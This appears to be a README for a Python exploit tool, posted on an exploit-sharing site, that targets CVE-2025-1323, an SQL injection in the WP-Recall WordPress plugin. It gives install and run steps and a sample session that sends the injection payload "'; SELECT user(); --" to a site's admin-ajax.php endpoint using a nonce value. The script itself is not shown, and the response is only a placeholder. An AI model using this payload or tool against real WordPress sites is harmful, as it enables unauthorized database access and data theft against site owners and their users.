Share
## https://sploitus.com/exploit?id=53570570-35ED-5E1A-B5EF-DF23954FF66A
# cve-2025-1323
WP-Recall Plugin SQL Injection 

## โš ๏ธ Legal Disclaimer

This tool is intended for **authorized security testing and educational use only**.  
Do not use against systems without explicit permission. Misuse may be illegal.

## โœ… Requirements

- Python 3.x
- `requests` module

Install dependencies:

```bash
pip install requests

python CVE-2025-1323.py

Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06

[*] Sending payload: '; SELECT user(); --

[+] Response received:
{"result":"SQL error or leaked data here..."}